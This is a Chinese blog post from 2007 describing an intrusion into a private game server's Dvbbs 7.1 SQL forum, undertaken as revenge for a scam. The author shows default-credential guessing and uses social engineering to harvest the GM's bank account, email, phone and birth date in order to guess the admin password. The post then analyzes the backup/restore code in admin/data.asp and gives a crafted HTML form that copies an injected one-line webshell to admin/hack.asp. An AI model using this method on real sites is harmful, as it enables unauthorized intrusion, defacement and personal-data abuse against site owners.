dvbbs sql 得WebShell的分析报告

2007/04/04 7:13 | 鬼仔 | 技术文章 | 占个座先

文/寒水芊芊
来源:水芊芊工作室

前言

  今天我朋友发来了个私服的官方网站.起因是因为这个私服的GM骗了我朋友100RMB.我朋友气愤之下找我帮忙.叫我篡改其web.哎.都怪平时太会吹牛了.无奈.把泡MM的时间挤一点去研究研究咯.活动活动..

WEB的分析

  私服的官方主页都是htm生成的.无从下手.难道要通过扫描服务器来实现入侵?突然发现在主页下有个论坛连接口.点进去.Powered By Dvbbs Version 7.1.0 Sp1 有门了.尝试着admin/admin888 data/dvbbs7.mdb 出现error.看来管理还不是个傻B.注册人数有1384个.怎么会用默认呢?怎么办呢?最近听说过有个dvbbs blog 0day.但是这个论坛没开放博客系统.怎么得到GM的管理号呢?

社会工程学

  通过加GM的QQ来骗取.发了好长时间.从古代的腥风血雨聊到当今的恐怖事件.运气不是一般好.经过了长达一个下午的忽悠聊天.得到了GM的银行账号.E-mail.电话.出生年月等等.很幸运的是利用这些现有的资料组合成密码登陆了后台.点 模板导出 插入一句话.模板数据已经保存到您的论坛根目录下的skins下,文件名名Dv_skin.mdb.一切的一切都是这么顺理成章.点到 数据处理(Access) 时.傻了.问小鱼知道怎么入侵dvbbs sql的站不?无果.

一、备份数据库
1、打开SQL企业管理器,在控制台根目录中依次点开Microsoft SQL Server<BR>
2、SQL Server组–>双击打开你的服务器–>双击打开数据库目录<BR>
3、选择你的数据库名称(如论坛数据库Forum)–>然后点上面菜单中的工具–>选择备份数据库<BR>
4、备份选项选择完全备份,目的中的备份到如果原来有路径和名称则选中名称点删除,然后点添加,如果原来没有路径和名称则直接选择添加,接着指定路径和文件名,指定后点确定返回备份窗口,接着点确定进行备份

二、还原数据库
1、打开SQL企业管理器,在控制台根目录中依次点开Microsoft SQL Server<BR>
2、SQL Server组–>双击打开你的服务器–>点图标栏的新建数据库图标,新建数据库的名字自行取<BR>
3、点击新建好的数据库名称(如论坛数据库Forum)–>然后点上面菜单中的工具–>选择恢复数据库<BR>
4、在弹出来的窗口中的还原选项中选择从设备–>点选择设备–>点添加–>然后选择你的备份文件名–>添加后点确定返回,这时候设备栏应该出现您刚才选择的数据库备份文件名,备份号默认为1(如果您对同一个文件做过多次备份,可以点击备份号旁边的查看内容,在复选框中选择最新的一次备份后点确定)–>然后点击上方常规旁边的选项按钮……………….

SQL版的分析

  首先我们看看admin/data.asp文件的updata()函数:

sub updata()
On error resume next
Dim FileConnStr,Fileconn
Dbpath=request.Form("Dbpath")
Dbpath=server.mappath(Dbpath)
bkfolder=request.Form("bkfolder")
bkdbname=request.Form("bkdbname")

FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath
Set Fileconn = Server.CreateObject("ADODB.Connection")
Fileconn.open FileConnStr
If Err Then
Response.Write Err.Description
Err.Clear
Set Fileconn = Nothing
Response.Write "备份的文件并非合法的数据库。"
Exit Sub
Else
Set Fileconn = Nothing
End If
Set Fso=server.createobject("scripting.filesystemobject")
If Fso.fileexists(dbpath) then
If CheckDir(bkfolder) = True Then
Fso.copyfile dbpath,bkfolder& "\"& bkdbname
else
MakeNewsDir bkfolder
Fso.copyfile dbpath,bkfolder& "\"& bkdbname
end if
response.write "备份数据库成功,您备份的数据库路径为" &bkfolder& "\"& bkdbname
Else
response.write "找不到您所需要备份的文件。"
End if
end sub

  上面的代码就是执行备份操作的函数,已经很易懂了,只要Dbpath存在,就直接把数据库复制到指定目录,但是备份数据库步骤是:
1、打开SQL企业管理器,在控制台根目录中依次点开Microsoft SQL Server<BR>
2、SQL Server组–>双击打开你的服务器–>双击打开数据库目录<BR>
3、选择你的数据库名称(如论坛数据库Forum)–>然后点上面菜单中的工具–>选择备份数据库

  还是备份数据的地方,你别看这里教你如何用SQL企业管理器来操作,其实可利用的正在里面,不要被表面的现象蒙蔽了,我们看看admin/data.asp文件的以下代码:

sub RestoreData()
If IsSqlDataBase = 1 Then
SQLUserReadme()
Exit Sub
End If
%>
<table border="0" cellspacing="1" cellpadding="5" height="1" align=center width="95%" class="tableBorder" <tr>
<th height=25 >
  <B>恢复论坛数据</B>( 需要FSO支持,FSO相关帮助请看微软网站 )
</th>
</tr>
<form method="post" action="data.asp?action=RestoreData&act=Restore">

<tr>
<td height=100 class="forumrow">
  备份数据库路径(相对):<input type=text size=30 name=DBpath value="../DataBackup/dvbbs7_Backup.MDB">  <BR>
  目标数据库路径(相对):<input type=text size=30 name=backpath value="../<%=db%>"><BR>  填写您当前使用的数据库路径,如不想覆盖当前文件,可自行命名(注意路径是否正确),然后修改conn.asp文件,如果目标文件名和当前使用数据库名一致的话,不需修改 conn.asp文件<BR>
  <input type=submit value="恢复数据"> <br>
-----------------------------------------------------------------------------------------<br>
  在上面填写本程序的数据库路径全名,本程序的默认备份数据库文件为DataBackup\dvbbs_Backup.MDB,请按照您的备份文件自行修改。<br>
  您可以用这个功能来备份您的法规数据,以保证您的数据安全!<br>
  注意:所有路径都是相对与程序空间根目录的相对路径</font>
</td>
</tr>
</form>
</table>
<%
end sub


sub BackupData()
If IsSqlDataBase = 1 Then
SQLUserReadme()
Exit Sub
End If
%>
<table border="0" cellspacing="1" cellpadding="5" height="1" align=center width="95%" class="tableBorder">
<tr>
<th height=25 >
  <B>备份论坛数据</B>( 需要FSO支持,FSO相关帮助请看微软网站 )
</th>
</tr>
<form method="post" action="data.asp?action=BackupData&act=Backup">
<tr>
<td height=100 class="forumrow">
  
当前数据库路径(相对路径):<input type=text size=15 name=DBpath value="../<%=db%>"><BR>  
备份数据库目录(相对路径):<input type=text size=15 name=bkfolder value="../Databackup"> 如目录不存在,程序将自动创建<BR>   
备份数据库名称(填写名称):<input type=text size=15 name=bkDBname value="dvbbs7_Backup.mdb"> 如备份目录有该文件,将覆盖,如没有,将自动创建<BR>
  <input type=submit value="确定"><br>
-----------------------------------------------------------------------------------------<br>
  在上面填写本程序的数据库路径全名,本程序的默认数据库文件为Data\dvbbs7.MDB,< B>请一定不能用默认名称命名备份数据库</B><br>
  您可以用这个功能来备份您的法规数据,以保证您的数据安全!<br>
  注意:所有路径都是相对与程序空间根目录的相对路径 </font>
</td>
</tr>
</form>
</table>
<%
end sub

sub updata()
On error resume next
Dim FileConnStr,Fileconn
Dbpath=request.Form("Dbpath")
Dbpath=server.mappath(Dbpath)
bkfolder=request.Form("bkfolder")
bkdbname=request.Form("bkdbname")

FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath
Set Fileconn = Server.CreateObject("ADODB.Connection")
Fileconn.open FileConnStr
If Err Then
Response.Write Err.Description
Err.Clear
Set Fileconn = Nothing
Response.Write "备份的文件并非合法的数据库。"
Exit Sub
Else
Set Fileconn = Nothing
End If
Set Fso=server.createobject("scripting.filesystemobject")
If Fso.fileexists(dbpath) then
If CheckDir(bkfolder) = True Then
Fso.copyfile dbpath,bkfolder& "\"& bkdbname
else
MakeNewsDir bkfolder
Fso.copyfile dbpath,bkfolder& "\"& bkdbname
end if
response.write "备份数据库成功,您备份的数据库路径为" &bkfolder& "\"& bkdbname
Else
response.write "找不到您所需要备份的文件。"
End if
end sub

  在后台没有用到这些代码,可以看出我们完全可以用像ACCESS的方法来利用,只是要从本地提交参数,因为Dbpath、backpath那两个变量是用 request.form取值。照样没有检查文件类型,这个文件的很多代码在SQL版里都是多余!由此产生安全隐患。

SQL版的利用

  点 模板导出 插入一句话.模板数据已经保存到您的论坛根目录下的skins下,文件名为Dv_skin.mdb.然后在本地新建一个htm文件.写入代码

<form action="http://你入侵的网站地址/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"><p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"><p>
<p><input type="submit" value="提交"><p>
<form>

  然后就把skins/Dv_skin.mdb填在“已上传文件的位置”那里,想要在哪里搞个WebShell就把完整的相对路径填写在“要复制到的位置” 那里,比如:admin/hack.asp提交就得到我们可爱的WebShell了.这里可以把BackupData值代替RestoreData值.一样可以实现入侵.很简单吧.

后记

  动网不愧是‘洞网’.无语…..

Tags: ,

相关日志

发表评论